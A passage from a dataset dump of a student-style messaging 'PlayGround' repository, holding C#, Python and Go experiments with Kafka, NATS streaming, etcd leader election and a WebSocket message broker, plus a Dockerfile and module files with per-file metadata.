Note: by default strings are encoded as UTF8.\n using var p = new ProducerBuilder<Null, string>(config).Build();\n for (var i = 0; i < 200; i++)\n {\n try\n {\n var dr = await p.ProduceAsync(\"test-topic3\", new Message<Null, string> { Value = $\"Message {i}\" });\n Console.WriteLine($\"Delivered '{dr.Value}' to '{dr.TopicPartitionOffset}'\");\n }\n catch (ProduceException<Null, string> e)\n {\n Console.WriteLine($\"Delivery failed: {e.Error.Reason}\");\n }\n await Task.Delay(5000);\n }\n\n while (true)\n {\n await Task.Delay(1000);\n }\n }\n }\n}\n" }, { "alpha_fraction": 0.644859790802002, "alphanum_fraction": 0.6495327353477478, "avg_line_length": 18.454545974731445, "blob_id": "102c593fd252c30b01ac82a1488981d687e8dd95", "content_id": "ddf6d744d95256a604bb44fc4eb86ddc893b6970", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 216, "license_type": "no_license", "max_line_length": 48, "num_lines": 11, "path": "/Deprecated Dream-Stream/Dream-Stream/Models/Messages/SubscriptionResponse.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using MessagePack;\n\nnamespace Dream_Stream.Models.Messages\n{\n [MessagePackObject]\n public class SubscriptionResponse : IMessage\n {\n [Key(1)]\n public string TestMessage { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.8554216623306274, "alphanum_fraction": 0.8554216623306274, "avg_line_length": 40.5, "blob_id": "5714200590f9548add056ed78fa3107199d409b1", "content_id": "55a3302715246fb0a3de951494341ef98cba68db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 83, "license_type": "no_license", "max_line_length": 69, "num_lines": 2, "path": "/README.md", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "# PlayGround\nPlayGround for different technologies with relevance for Dream-Stream\n" }, { "alpha_fraction": 0.6064029932022095, "alphanum_fraction": 0.6082862615585327, "avg_line_length": 28.518518447875977, "blob_id": "af0f9a621e4558c04edfa71e2f8adc8418e0410e", "content_id": "a86d1b8d64b47702c083a6b06e36c0bf177c12ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1593, "license_type": "no_license", "max_line_length": 118, "num_lines": 54, "path": "/Deprecated Dream-Stream/Dream-Stream/Services/TopicList.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Threading.Tasks;\nusing dotnet_etcd;\nusing Etcdserverpb;\nusing Mvccpb;\n\nnamespace Dream_Stream.Services\n{\n public class TopicList\n {\n private readonly EtcdClient _client;\n public const string Prefix = \"TopicList/\";\n private readonly string _me;\n\n\n public TopicList(EtcdClient client, string me)\n {\n _me = me;\n _client = client;\n }\n\n public async Task SetupTopicListWatch()\n {\n _client.WatchRange(Prefix, HandleTopicListWatch);\n var rangeResponse = await _client.GetRangeAsync(Prefix);\n HandleTopicListGet(rangeResponse);\n }\n\n private void HandleTopicListGet(RangeResponse rangeResponse)\n {\n foreach (var keyValue in rangeResponse.Kvs)\n {\n Task.Run(async () => await HandleElectionForKeyValue(keyValue));\n }\n }\n\n private async void HandleTopicListWatch(WatchResponse response)\n {\n foreach (var responseEvent in response.Events)\n {\n await HandleElectionForKeyValue(responseEvent.Kv);\n }\n }\n\n private async Task HandleElectionForKeyValue(KeyValue keyValue)\n {\n var topic = 
keyValue.Key.ToStringUtf8().Substring(Prefix.Length);\n\n var leaderElection = new LeaderElection(_client, topic, _me);\n await leaderElection.Election();\n Console.WriteLine($\"Handling Election for {keyValue.Key.ToStringUtf8()}:{keyValue.Value.ToStringUtf8()}\");\n }\n }\n}" }, { "alpha_fraction": 0.5739580392837524, "alphanum_fraction": 0.5769544839859009, "avg_line_length": 40.2471923828125, "blob_id": "7d043cbde23ac2c86e2275db3d8d9554573bab6b", "content_id": "e1ef07e0f83fd27eb9ed7366a1b3c894ea49f628", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 3673, "license_type": "no_license", "max_line_length": 174, "num_lines": 89, "path": "/Deprecated Dream-Stream/Dream-Stream/Services/MessageHandler.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Net.WebSockets;\nusing System.Threading;\nusing System.Threading.Tasks;\nusing Dream_Stream.Models.Messages;\nusing MessagePack;\nusing Microsoft.AspNetCore.Http;\nusing Prometheus;\n\nnamespace Dream_Stream.Services\n{\n public class MessageHandler\n {\n private static readonly Counter Counter = Metrics.CreateCounter(\"Messages_Received\", \"\");\n\n public async Task Handle(HttpContext context, WebSocket webSocket)\n {\n var buffer = new byte[1024 * 4];\n WebSocketReceiveResult result = null;\n Console.WriteLine($\"Handling message from: {context.Connection.RemoteIpAddress}\");\n try\n {\n do\n {\n result = await webSocket.ReceiveAsync(new ArraySegment<byte>(buffer), CancellationToken.None);\n if (result.CloseStatus.HasValue) break;\n\n var message =\n LZ4MessagePackSerializer.Deserialize<IMessage>(buffer.Take(result.Count).ToArray());\n\n switch (message)\n {\n case MessageContainer msg:\n await HandlePublishMessage(msg);\n Counter.Inc();\n break;\n case SubscriptionRequest msg:\n await HandleSubscriptionRequest(msg, webSocket);\n break;\n case MessageRequest msg:\n await HandleMessageRequest(msg, webSocket);\n break;\n }\n \n \n } while (!result.CloseStatus.HasValue);\n }\n catch (Exception e)\n {\n Console.WriteLine(e);\n }\n finally\n {\n await webSocket.CloseAsync(WebSocketCloseStatus.NormalClosure, result?.CloseStatusDescription ?? \"Failed hard\", CancellationToken.None);\n }\n }\n\n private static async Task HandleMessageRequest(MessageRequest msg, WebSocket webSocket)\n {\n //TODO Handle MessageRequest correctly\n var buffer = LZ4MessagePackSerializer.Serialize<IMessage>(new MessageContainer\n {\n Header = new MessageHeader {Topic = \"SensorData\", Partition = 3},\n Messages = new List<Message> { new Message {Address = \"Address\", LocationDescription = \"Description\", SensorType = \"Sensor\", Measurement = 20, Unit = \"Unit\"}}\n });\n await webSocket.SendAsync(new ArraySegment<byte>(buffer), WebSocketMessageType.Binary, false,\n CancellationToken.None);\n }\n\n private static async Task HandleSubscriptionRequest(SubscriptionRequest message, WebSocket webSocket)\n {\n //TODO Handle SubRequest correctly\n Console.WriteLine($\"Consumer subscribed to: {message.Topic}\");\n var buffer = LZ4MessagePackSerializer.Serialize<IMessage>(new SubscriptionResponse {TestMessage = $\"You did it! 
You subscribed to {message.Topic}\"});\n await webSocket.SendAsync(new ArraySegment<byte>(buffer), WebSocketMessageType.Binary, false,\n CancellationToken.None);\n }\n\n private static async Task HandlePublishMessage(MessageContainer messages)\n {\n //TODO Store the message\n //TODO Respond to publisher that the message is received correctly\n messages.Print();\n await Task.Run(() => Task.CompletedTask);\n }\n }\n}\n" }, { "alpha_fraction": 0.6218568682670593, "alphanum_fraction": 0.6286267042160034, "avg_line_length": 26.236841201782227, "blob_id": "0646513745328a2c5bcbc73b0f3e9fea66c1a8a9", "content_id": "dab28e2c06dc056350311d96876972db429e3e0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1034, "license_type": "no_license", "max_line_length": 73, "num_lines": 38, "path": "/Nats/Python/Consumer.py", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "import asyncio\nimport msvcrt\nfrom nats.aio.client import Client as NATS\n\nasync def run(loop):\n nc = NATS()\n\n await nc.connect(\"localhost:4222\", loop=loop)\n\n async def message_handler(msg):\n subject = msg.subject\n reply = msg.reply\n data = msg.data.decode()\n print(\"Received a message on '{subject} {reply}': {data}\".format(\n subject=subject, reply=reply, data=data))\n\n # Simple publisher and async subscriber via coroutine.\n sid = await nc.subscribe(\"foo\", cb=message_handler)\n\n print(\"The consumer is ready to receive messages\")\n print(\"Press enter to close the application\")\n\n while True:\n await asyncio.sleep(1, loop=loop)\n if msvcrt.kbhit():\n if ord(msvcrt.getch()) == 13:\n break\n\n # Remove interest in subscription.\n await nc.unsubscribe(sid)\n\n # Terminate connection to NATS.\n await nc.close()\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run(loop))\n loop.close()" }, { "alpha_fraction": 0.7136842012405396, "alphanum_fraction": 0.7284210324287415, "avg_line_length": 24.052631378173828, "blob_id": "c3206a3fd2ac690800851c3e58980b7f0e238baf", "content_id": "0626f707c6f9b388dd56040f784fae4ebad27e80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 475, "license_type": "no_license", "max_line_length": 56, "num_lines": 19, "path": "/Kafka/Go/Publisher/Dockerfile", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "FROM golang:1.12.9-alpine3.10 AS base\nRUN apk add build-base bash git\nRUN git clone https://github.com/edenhill/librdkafka.git\nWORKDIR librdkafka\nRUN ./configure --prefix /usr && make && make install\nRUN apk del build-base bash git\nRUN rm -r /go/librdkafka\n\nFROM base AS builder\nRUN apk add git pkgconf build-base\nWORKDIR /go/src/app\nCOPY . 
.\nRUN go get -d -v ./...\nRUN go build -o app\n\nFROM base\nWORKDIR /go/src/app\nCOPY --from=builder /go/src/app/app .\nENTRYPOINT [\"./app\"]" }, { "alpha_fraction": 0.5118373036384583, "alphanum_fraction": 0.5201733708381653, "avg_line_length": 34.71428680419922, "blob_id": "de65e6afd05bf87dd26c6c464f2e9d8fcc390f68", "content_id": "bd4fbfc16029f28ca2698a7d305a1f930fa66a1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 3001, "license_type": "no_license", "max_line_length": 122, "num_lines": 84, "path": "/NatsStreaming/dotnet/Producer/Producer/Program.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Text;\nusing System.Threading;\nusing STAN.Client;\n\nnamespace Producer\n{\n internal class StanPublisher\n {\n private readonly StanOptions _cOpts = StanOptions.GetDefaultOptions();\n\n private const int Count = 10000;\n private string _clientId = \"cs-publisher\";\n private const string ClusterId = \"nats-streaming\";\n private readonly byte[] _payload = Encoding.UTF8.GetBytes(\"hello\");\n private const string Subject = \"foo\";\n private const string Url = \"nats://nats-cluster:4222\";\n private const bool Verbose = false;\n\n private void Run(string[] args)\n {\n _clientId += Guid.NewGuid();\n\n Banner();\n\n _cOpts.NatsURL = Url;\n using var c = new StanConnectionFactory().CreateConnection(ClusterId, _clientId, _cOpts);\n while (true)\n {\n long acksProcessed = 0;\n var sw = Stopwatch.StartNew();\n var ev = new AutoResetEvent(false);\n\n // async\n for (var i = 0; i < Count; i++)\n {\n var guid = c.Publish(Subject, _payload, (obj, pubArgs) =>\n {\n if (Verbose) Console.WriteLine(\"Received ack for message {0}\", pubArgs.GUID);\n if (!string.IsNullOrEmpty(pubArgs.Error))\n Console.WriteLine(\"Error processing message {0}\", pubArgs.GUID);\n\n if (Interlocked.Increment(ref acksProcessed) == Count)\n ev.Set();\n });\n\n if (Verbose)\n Console.WriteLine(\"Published message with guid: {0}\", guid);\n }\n\n ev.WaitOne();\n sw.Stop();\n\n Console.Write(\"Published {0} msgs with acknowledgements in {1} seconds \", Count, sw.Elapsed.TotalSeconds);\n Console.WriteLine(\"({0} msgs/second).\", (int)(Count / sw.Elapsed.TotalSeconds));\n }\n }\n\n private void Banner()\n {\n Console.WriteLine(\"Connecting to cluster '{0}' as client '{1}'.\", ClusterId, _clientId);\n Console.WriteLine(\"Publishing {0} messages on subject {1}\", Count, Subject);\n Console.WriteLine(\" Url: {0}\", Url); \n Console.WriteLine(\" Payload is {0} bytes.\", _payload?.Length ?? 
0);\n Console.WriteLine(\" Publish Mode is Asynchronous\" );\n }\n\n public static void Main(string[] args)\n {\n try\n {\n new StanPublisher().Run(args);\n }\n catch (Exception ex)\n {\n Console.Error.WriteLine(\"Exception: \" + ex.Message);\n if (ex.InnerException != null)\n Console.Error.WriteLine(\"Inner Exception: \" + ex.InnerException.Message);\n }\n }\n }\n}" }, { "alpha_fraction": 0.5408970713615417, "alphanum_fraction": 0.5514512062072754, "avg_line_length": 21.352941513061523, "blob_id": "71d268d55ebbd5e6e0315fb8a85414e78b126f4d", "content_id": "5827dfd91af252c1e7078577de51b51d825b2fff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 381, "license_type": "no_license", "max_line_length": 42, "num_lines": 17, "path": "/Deprecated Dream-Stream/Dream-Stream/Models/Messages/MessageRequest.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using MessagePack;\n\nnamespace Dream_Stream.Models.Messages\n{\n [MessagePackObject]\n public class MessageRequest : IMessage\n {\n [Key(1)]\n public string Topic { get; set; }\n [Key(2)]\n public int Partition { get; set; }\n [Key(3)]\n public ulong OffSet { get; set; }\n [Key(4)]\n public int ReadSize { get; set; }\n }\n}" }, { "alpha_fraction": 0.47316062450408936, "alphanum_fraction": 0.4806217551231384, "avg_line_length": 29.929487228393555, "blob_id": "007f6464fd228d93c7bb94f026a8b8fe62fc4580", "content_id": "aa3d94528b78db77f44082361d17a1e86ac6db20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 4827, "license_type": "no_license", "max_line_length": 130, "num_lines": 156, "path": "/Etcd/EtcdTester/EtcdTester/Program.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Linq;\nusing System.Threading;\nusing System.Threading.Tasks;\nusing dotnet_etcd;\nusing Etcdserverpb;\nusing Mvccpb;\n\nnamespace EtcdTester\n{\n internal class Program\n {\n private const int LeaseTtl = 1;\n private const string LeaderKey = \"leader/topic1\";\n\n public static async Task Main(string[] args)\n {\n var me = Guid.NewGuid().ToString();\n Console.WriteLine(\"Hello World!\");\n\n var client = new EtcdClient(\"http://localhost\");\n await WatchExample(client);\n //await LeaderElectionExample(client, me);\n\n client.Dispose();\n }\n\n // Inspiration for the leader election have been found here: https://www.sandtable.com/etcd3-leader-election-using-python/\n private static async Task LeaderElectionExample(EtcdClient client, string me)\n {\n client.Watch(LeaderKey, SetNewElection);\n while (true)\n {\n NewElection = false;\n var (leader, lease) = await LeaderElection(client, me);\n if (leader)\n {\n Console.WriteLine(\"I'm the leader!!!\");\n var count = 0;\n while (count < 20)\n {\n count++;\n client.LeaseKeepAlive(new LeaseKeepAliveRequest { ID = lease.ID }, Print, CancellationToken.None);\n Thread.Sleep(500);\n }\n\n Console.WriteLine(\"I'm no longer the leader\");\n Thread.Sleep(10000);\n }\n else\n {\n Console.WriteLine(\"I'm a follower!!!\");\n while (!NewElection)\n {\n Thread.Sleep(500);\n }\n }\n }\n }\n\n private static void SetNewElection(WatchResponse watchResponse)\n {\n if(watchResponse.Events.Any(eventS => eventS.Type == Event.Types.EventType.Delete)) NewElection = true;\n }\n\n public static bool NewElection { get; set; }\n\n private static async Task<(bool, LeaseGrantResponse lease)> LeaderElection(EtcdClient client, string me)\n {\n bool result;\n var lease = 
client.LeaseGrant(new LeaseGrantRequest{TTL = LeaseTtl});\n\n try\n {\n result = await AddLeader(client, LeaderKey, me, lease);\n }\n catch (Exception e)\n {\n Console.WriteLine(e);\n return (false, lease);\n }\n\n return (result, lease);\n }\n\n private static async Task<bool> AddLeader(EtcdClient client, string key, string value, LeaseGrantResponse lease)\n {\n var protoKey = Google.Protobuf.ByteString.CopyFromUtf8(key);\n var transactionAsync = await client.TransactionAsync(new TxnRequest\n {\n Compare =\n {\n new Compare{Key = protoKey, Version = 0}\n },\n Success =\n {\n new RequestOp\n {\n RequestPut = new PutRequest\n {\n Key = protoKey,\n Value = Google.Protobuf.ByteString.CopyFromUtf8(value),\n Lease = lease.ID\n }\n }\n },\n Failure = { }\n });\n return transactionAsync.Succeeded;\n }\n\n\n\n\n\n\n\n\n private static async Task WatchExample(EtcdClient client)\n {\n //var count = 0;\n client.WatchRange(\"TopicList/\", Print);\n client.WatchRange(\"Broker/\", Print);\n client.WatchRange(\"Leader/\", Print);\n while (true)\n {\n //count++;\n\n //if (count % 10 == 0) await client.PutAsync(\"topic1/partition1\", $\"pod{count}\");\n //if (count % 3 == 0) await client.PutAsync(\"topic1/partition2\", $\"pod{count}\");\n\n Thread.Sleep(500);\n }\n }\n\n private static void Print(WatchResponse response)\n {\n if (response.Events.Count == 0)\n {\n Console.WriteLine(response);\n }\n else\n {\n foreach (var responseEvent in response.Events)\n {\n Console.WriteLine($\"{responseEvent.Kv.Key.ToStringUtf8()}:{responseEvent.Kv.Value.ToStringUtf8()}\");\n }\n }\n }\n\n private static void Print(LeaseKeepAliveResponse response)\n {\n //Console.WriteLine(response);\n }\n }\n}\n" }, { "alpha_fraction": 0.5592105388641357, "alphanum_fraction": 0.7598684430122375, "avg_line_length": 26.636363983154297, "blob_id": "943d01da473b0f1e0541e37d9d789544a2374889", "content_id": "82c6d2a8386ed686e2e2f66f44f7a28f34312aa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 304, "license_type": "no_license", "max_line_length": 64, "num_lines": 11, "path": "/Nats/Go/go.mod", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "module NatsInGo\n\ngo 1.12\n\nrequire (\n\tgithub.com/eiannone/keyboard v0.0.0-20190314115158-7169d0afeb4f\n\tgithub.com/golang/protobuf v1.3.2 // indirect\n\tgithub.com/nats-io/nats-server/v2 v2.0.4 // indirect\n\tgithub.com/nats-io/nats.go v1.8.1\n\tgolang.org/x/sys v0.0.0-20190826190057-c7b8b68b1456 // indirect\n)\n" }, { "alpha_fraction": 0.557692289352417, "alphanum_fraction": 0.7628205418586731, "avg_line_length": 18.5, "blob_id": "843ec343c09ef3280803b00aa4b51777e897ad07", "content_id": "b134ad3d53fa39c1f026ee1cf7e714349e0465b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 156, "license_type": "no_license", "max_line_length": 64, "num_lines": 8, "path": "/Kafka/Go/go.mod", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "module KafkaInGo\n\ngo 1.12\n\nrequire (\n\tgolang.org/x/sys v0.0.0-20190826190057-c7b8b68b1456 // indirect\n\tgopkg.in/confluentinc/confluent-kafka-go.v1 v1.1.0\n)\n" } ]
19
schinckel/Auto-Models
https://github.com/schinckel/Auto-Models
8a67dc6007d3ad18a63a491717cb77e315c6199e
080a09202d64211253833677fcd19c58a0b69ac4
5c39f702197d6364de171f4f44f92ec9b4251f45
refs/heads/master
2020-12-25T00:39:21.405865
2010-02-14T15:35:35
2010-02-14T15:35:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6565139293670654, "alphanum_fraction": 0.6682876944541931, "avg_line_length": 31.28099250793457, "blob_id": "33117c6ae2a39b5212a1683ed594beb7d3fdb67d", "content_id": "7f6c958fc07551d708e8ad1b1f55e90e88df9415", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3907, "license_type": "no_license", "max_line_length": 109, "num_lines": 121, "path": "/README.markdown", "repo_name": "schinckel/Auto-Models", "src_encoding": "UTF-8", "text": "\n## OVERVIEW\n\n### Turns the following code:\n \n class TestType(models.Model):\n OS_TYPES_LIST = [\"Windows\", \"Mac\", \"Ubuntu\"]\n os_types_max_len, OS_TYPES, OS_TYPES_CHOICES = model_utils.convert_to_choices(OS_TYPES_LIST)\n \n OS_VERSION_LIST = [\"7\", \"XP\", \"Vista\", \"X.4\", \"X.5\", \"X.6\", \"8.04\", \"9.06\"]\n os_version_max_len, OS_VERSION, OS_VERSION_CHOICES = model_utils.convert_to_choices(OS_VERSION_LIST)\n \n FF_VERSION_LIST = [\"3.0\", \"3.5\", \"3.6\"]\n ff_max_len, FF_VERSION, FF_VERSION_CHOICES = model_utils.convert_to_choices(FF_VERSION_LIST)\n \n slug = models.CharField(max_length=200)\n name = models.CharField(max_length=200)\n os_type = models.CharField(max_length=os_types_max_len, choices=OS_TYPES_CHOICES)\n os_version = models.CharField(max_length=os_version_max_len, choices=OS_VERSION_CHOICES)\n ff_version = models.CharField(max_length=ff_max_len, choices=FF_VERSION_CHOICES)\n \n ...\n \n class TestRun(models.Model):\n test_type = models.ForeignKey(TestType)\n dtime = models.DateTimeField(db_index=True)\n is_pass = models.BooleanField(default=False)\n number_fail = models.IntegerField(default=-1)\n total = models.IntegerField(default=-1)\n duration = models.IntegerField(default=-1)\n \n ...\n \n### into an OmniGraffle diagram that looks like this:\n\n<img src=\"http://github.com/diN0bot/Auto-Models/raw/master/screenshot.png\" width=\"35%\" />\n\n### Turns the above OmniGraffle diagram into the following Django code:\n\n class TestType(models.Model):\n id = models.AutoField()\n slug = models.CharField(max_length=200)\n name = models.CharField(max_length=200)\n os_type = models.CharField(max_length=200)\n os_version = models.CharField(max_length=200)\n ff_version = models.CharField(max_length=200)\n\n class TestRun(models.Model):\n id = models.AutoField()\n test_type = models.ForeignKey('TestType')\n dtime = models.DateTimeField()\n is_pass = models.BooleanField()\n number_fail = models.IntegerField()\n total = models.IntegerField()\n duration = models.IntegerField()\n\n\n### Coming soon: keep existing diagrams and code in synch.\n\n## STATUS\n\n[x] Create OmniGraffle diagram from Django models code\n\n[ ] Update OmniGraffle diagram from Django models code\n\n[X] Create Django models code from OmniGraffle diagram\n\n[ ] Update Django models code from OmbniGraffle diagram\n\n## DEPENDENCIES\n\nOmniGraffle\n\n* [http://www.omnigroup.com/applications/omnigraffle/](http://www.omnigroup.com/applications/omnigraffle/)\n* Mac-only software\n* requires OmniGraffle\n* requires appscript, python library for AppleScript\n* [http://appscript.sourceforge.net/py-appscript/doc/](http://appscript.sourceforge.net/py-appscript/doc/)\n\n sudo easy_install appscript\n\nDjango\n\n* [http://djangoproject.com](http://djangoproject.com)\n\n## RUN\n\nFrom command line:\n\n cd <Django project (or some directory inside project)>\n python main.py <django app name>,<django app2 name>,...\n \nFor example, to create a diagram for the models in apps foo\nand bar, run like so:\n\n 
python main.py foo,bar\n \nThe script does a force-directed layout on the models. This will\nlikely need to be tweaked, both through the \"Canvas: Diagram Layout\"\ninspector (apple-4) and by hand.\n\n## TODO\n\n[x] Add fields to diagram nodes\n\n[x] First pass automatic layout\n\n[ ] Be lenient in what is accepted when loading OmniGraffle files (to \n permit users to alter, add notes)\n \n[ ] More robust, clean errors all over\n\nIf requested:\n\n[ ] Remove diN0-specific Django dependencies so people (without sweet\nDjango setups) can use this off the shelf\n\n[ ] Nice GUI or command-line interface\n\n[ ] other diagram formats\n\n[ ] other code formats\n" }, { "alpha_fraction": 0.6461843252182007, "alphanum_fraction": 0.6565907001495361, "avg_line_length": 29.984615325927734, "blob_id": "e656e747d9592b4a0670800a02b9261ac25bc3a5", "content_id": "56b565b16a59a895316b8a21a3425d7b16be1b6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2018, "license_type": "no_license", "max_line_length": 91, "num_lines": 65, "path": "/main.py", "repo_name": "schinckel/Auto-Models", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nReads Django models and creates new OmniGraffle file\n\nRun this script:\n cd <somewhere in Django project>\n python <absolute path>/main.py\n\"\"\"\n\n\nfrom django_interface import DjangoModelInterface, _find_file_in_ancestors\nfrom omni_interface import OmniGraffleInterface\n\nimport sys\n\nif __name__ == \"__main__\":\n \"\"\"\n test script:\n 1. loads Django models\n 2. writes OmniGraffle file based on models\n 3. reads back OmniGraffle file\n 4. prints Django classes\n \"\"\"\n \n if len(sys.argv) > 1:\n apps = sys.argv[1].split(',')\n else:\n try:\n # settings.APPS is a neat Django trick:\n # http://proudly.procrasdonate.com/django-tricks-part-5-automatic-app-settings/\n settings_dir = _find_file_in_ancestors(\"settings.py\")\n sys.path.append(settings_dir)\n \n from django.core.management import setup_environ\n import settings\n setup_environ(settings)\n apps = settings.APPS\n except:\n print \"\"\"\nPlease provide comma-separated list of Django apps:\n python <path>/main.py foo,bar,baz\n \n\"\"\"\n exit(1)\n \n aobjects = DjangoModelInterface.load_aobjects(apps)\n print \"\\nSuccessfully loaded Django models into internal format\"\n #DjangoModelInterface.pretty_print(aobjects)\n \n ogi = OmniGraffleInterface()\n ogi.create_graffle(aobjects)\n print \"\\nSuccessfully created OmniGraffle diagram from internal format\"\n \n #print '-'*20, \"expected models\", '-'*20\n #expected_code = DjangoModelInterface.create_classes(aobjects)\n #DjangoModelInterface.print_classes(aobjects)\n #print '-'*60\n \n aobjects2 = ogi.load_aobjects()\n print \"\\nSuccessfully loaded OmniGraffle back into internal format\"\n print \"\\nWriting Django code from format:\\n\"\n DjangoModelInterface.print_classes(aobjects2)\n #print '-'*20, \"actual models\", '-'*20\n #actual_code = DjangoModelInterface.create_classes(aobjects2)\n " }, { "alpha_fraction": 0.5474950075149536, "alphanum_fraction": 0.5488978028297424, "avg_line_length": 32.716217041015625, "blob_id": "de20c98269318d31427473f2d31d35027bd1009b", "content_id": "8c76c279aec7a094fa80f684bf880db2b1d3f35e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4990, "license_type": "no_license", "max_line_length": 88, "num_lines": 148, "path": "/django_interface.py", "repo_name": "schinckel/Auto-Models", 
"src_encoding": "UTF-8", "text": "\nfrom data_structures import *\n\nimport sys\n\nclass DjangoModelInterface(object):\n \"\"\"\n Abstracts Django specific parsing and editing.\n \"\"\"\n \n def __init__(self):\n raise \"Nothing worth instantiating\"\n \n @classmethod\n def load_aobjects(klass, apps=None):\n \"\"\"\n Loads models from apps into AObjects\n \n note: Must be run from within Django project.\n note: In order for all relation edges to be shown,\n all referenced apps should be included.\n \n @param apps: list of app names, eg ['foo', 'bar']\n @return: list of AObjects\n \"\"\"\n apps = apps or []\n # All AObjects created from models in apps\n # model class object -> AObject\n obj_dict = {}\n setup_django_environment()\n \"\"\"\n Load models into internal data structures\n 1. First pass collects models as AObjects\n 2. Second pass sets fields, including ForeignKeys to AObjects\n \"\"\"\n klass._model_iterator(obj_dict, apps, klass._first_pass)\n klass._model_iterator(obj_dict, apps, klass._second_pass)\n \n return obj_dict.values()\n\n @classmethod\n def _first_pass(klass, obj_dict, model):\n \"\"\" First pass collects models as AObjects \"\"\"\n # create AObject for model class\n o = AObject(model.__name__)\n obj_dict[model] = o\n \n @classmethod\n def _second_pass(klass, obj_dict, model):\n \"\"\" Second pass sets fields, including ForeignKeys to AObjects \"\"\"\n # retrieve AObject for model class\n o = obj_dict[model]\n\n # iterate over model's fields to add AFields\n for field in model._meta.fields:\n f = AField(field.name, field.get_internal_type())\n if field.rel:\n if field.rel.to in obj_dict:\n f.set_destination(obj_dict[field.rel.to])\n o.add_field(field=f)\n \n @classmethod\n def _model_iterator(klass, obj_dict, apps, fn):\n \"\"\"\n @param fn: function that takes 2 parameters:\n klass (DjangoModelInterface instance)\n model (class object)\n \"\"\"\n for app in apps:\n app = __import__(app)\n # PD_SPECIFIC: use of ALL_MODELS, list of class names\n for model in app.models.ALL_MODELS:\n # retrieve class object for class name\n #model = getattr(app.models, model)\n fn(obj_dict, model)\n \n @classmethod\n def print_classes(klass, aobjects, filename=None):\n \"\"\"\n Convenience function for printing create_classes \n \"\"\"\n lines = klass.create_classes(aobjects, filename)\n if filename:\n f = open(filename)\n f.write(\"\\n\".join(lines))\n f.close()\n else:\n print \"\\n\".join(lines)\n \n @classmethod\n def create_classes(klass, aobjects, filename=None):\n \"\"\"\n @return: list of strings representing lines of code\n \"\"\"\n lines = []\n for aobject in aobjects:\n lines.append(\"class %s(models.Model):\" % aobject.name)\n for field in aobject.fields:\n p = []\n if field.dest:\n p.append(\"'%s'\" % field.dest.name)\n if field.type == 'CharField':\n p.append(\"max_length=200\")\n lines.append(\" %s = models.%s(%s)\" % (field.name,\n field.type,\n \", \".join(p)))\n lines.append(\"\")\n \n # ToDo: print __unicode__ and Make methods, also class docs (OG notes?)\n # more default fields? 
what to express in omni graffle, visually v notes\n return lines\n\n @classmethod\n def pretty_print(klass, aobjects):\n for m in aobjects:\n print m.name\n for f in m.fields:\n print \" \", f.name, f.type\n if f.dest:\n print \" \", f.dest.name\n\n\n####### DJANGO UTILTIES #######\n\ndef setup_django_environment():\n \"\"\" Setup Django environment \"\"\"\n # Nearest ancestor directory with a 'settings.py' file\n settings_dir = _find_file_in_ancestors(\"settings.py\")\n sys.path.append(settings_dir)\n \n from django.core.management import setup_environ\n import settings\n setup_environ(settings)\n\ndef _find_file_in_ancestors(filename):\n \"\"\"\n For each parent directory, check if 'filename' exists. If found, return\n the path; otherwise raise RuntimeError.\n \"\"\"\n import os\n path = os.path.realpath(os.path.curdir)\n while not filename in os.listdir(path):\n #if filename in os.listdir(path):\n # return path\n newpath = os.path.split(path)[0]\n if path == newpath:\n raise RuntimeError(\"No file '%s' found in ancestor directories.\" % filename)\n path = newpath\n return path" } ]
3
Shamp8/Homework_python
https://github.com/Shamp8/Homework_python
339da5e3fb605571b2aebb78e3efa91b165c32ad
e03fe6f378b5f9c1ec510e5eb1adef8ec7009ca5
3349b7e0cbaa5e18ee7f46ea7cbab57c94804532
refs/heads/1
2023-07-04T12:58:20.935999
2021-07-25T17:16:33
2021-07-25T17:16:33
389,400,104
0
0
null
2021-07-25T17:07:03
2021-07-25T17:34:13
2021-08-11T14:10:08
Python
